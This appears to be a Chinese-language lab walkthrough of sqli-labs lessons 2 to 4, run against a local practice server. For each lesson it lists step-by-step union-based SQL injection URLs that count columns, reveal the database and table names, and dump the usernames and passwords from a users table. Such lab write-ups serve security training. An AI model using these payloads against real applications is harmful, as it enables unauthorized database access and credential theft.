Less2-Less4和Less1的查询语句类似，只是引号及括号的区别。

Less2

基于错误_GET_数字型注入

http://localhost:8088/sqlilabs/Less-2/?id=1
http://localhost:8088/sqlilabs/Less-2/?id=1'
http://localhost:8088/sqlilabs/Less-2/?id=1"

第一条正常，第二、第三条报错：数字型注入
查询语句：

select username,password from table_name where id=$_GET['id'] limit 0,1

http://localhost:8088/sqlilabs/Less-2/?id=1 order by 4--+

3个字段

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,concat_ws('-',user(),database())--+

数据库：security

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名：users

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名：id、username、password

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

END.

Less3

基于错误_GET_单引号_小括号_字符型注入

http://localhost:8088/sqlilabs/Less-3/?id=1
http://localhost:8088/sqlilabs/Less-3/?id=1'
http://localhost:8088/sqlilabs/Less-3/?id=1"

第一、第三条正常，第二条报错：字符型注入
查询语句：

select username,password from table_name where id=('$_GET['id']') limit 0,1

http://localhost:8088/sqlilabs/Less-3/?id=1') order by 4--+

3个字段

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,concat_ws('-',user(),database())--+

数据库：security

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名：users

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名：id、username、password

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

END.

Less4

基于错误_GET_双引号_小括号_字符型注入

http://localhost:8088/sqlilabs/Less-4/?id=1
http://localhost:8088/sqlilabs/Less-4/?id=1'
http://localhost:8088/sqlilabs/Less-4/?id=1"

第一、第二条正常，第三条报错：字符型注入
查询语句：

select username,password from table_name where id=("$_GET['id']") limit 0,1

http://localhost:8088/sqlilabs/Less-4/?id=1") order by 4--+

3个字段

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,concat_ws('-',user(),database())--+

数据库：security

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名：users

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名：id、username、password

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

END.